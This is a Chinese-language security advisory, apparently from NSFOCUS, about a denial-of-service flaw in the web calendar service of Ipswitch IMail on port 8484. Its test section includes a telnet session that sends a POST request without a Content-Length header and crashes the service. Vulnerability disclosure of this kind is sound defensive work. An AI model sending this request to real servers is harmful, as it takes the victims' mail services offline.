漏洞类别：

攻击类型：

发布日期：

更新日期：

受影响系统：

安全系统：

无

漏洞报告人：

漏洞描述：

IMail是一款由Ipswitch公司开发和维护的商业电子邮件服务程序，IMail可使用在Microsoft Windows操作系统下，其中包含基于WEB的日历服务。
IMail的WEB的日历服务在处理HTTP POST请求时缺少正确的处理，远程攻击者可以利用这个漏洞进行拒绝服务攻击。
IMail的WEB的日历服务监听TCP 8484端口，攻击者可以提交不包含"Content-Length"长度的HTTP POST请求给IMail的WEB的日历服务，可导致iwebcal服务崩溃，产生拒绝服务攻击。

测试方法：

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

xxx@xx:~$ telnet 192.168.0.2 8484
Trying 192.168.0.2...
Connected to 192.168.0.2.
Escape character is '^]'.
POST / HTTP/1.0
Connection closed by foreign host.
[the iwebcal service has crashed]
xxx@xx:~$ telnet 192.168.0.2 8484
Trying 192.168.0.2...
telnet: connect to address 192.168.0.2: Connection refused

解决方法：

临时解决方法：
如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：
* 暂时没有合适的临时解决方法。
厂商补丁：
Ipswitch
--------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
http://www.ipswitch.com/